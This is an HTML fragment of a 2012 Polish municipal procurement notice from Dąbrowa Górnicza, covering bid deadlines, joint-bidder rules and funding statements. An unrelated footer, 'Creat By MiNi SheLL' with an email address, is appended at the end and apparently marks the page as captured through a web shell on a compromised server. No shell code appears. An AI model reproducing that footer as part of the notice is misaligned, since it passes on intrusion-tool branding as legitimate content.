<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2012 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej					
41-300 Dąbrowa Górnicza
ul. Graniczna 21 
Wydział Gospodarki Mieszkaniowej i Komunalnej, III piętro, pokój nr 314.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Zamówienie nie jest finansowane ze środków Unii Europejskiej. II.Wykonawcy wspólnie ubiegający się o udzielenie  zamówienia. 1 Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8  SIWZ oraz złożyć dokumenty  i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione 
w pkt. 9.2.1. - 9.2..4.  SIWZ przez  każdego z  nich, natomiast dokumenty i oświadczenia  wymienione 
w pkt. 9.1.2 - 9.1.4 . SIWZ wspólnie, przy czym w przypadku polisy Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia. Oświadczenie wymienione w pkt. 9.1.1. SIWZ - winno być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ winien być podpisany przez uprawnionych przedstawicieli Wykonawców.
3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym 
postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
4. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
5. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
6. Zakończenie realizacji zamówienia: 4 lata od dnia podpisania umowy lub do momentu wyczerpania środków finansowych przeznaczonych na ten cel..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com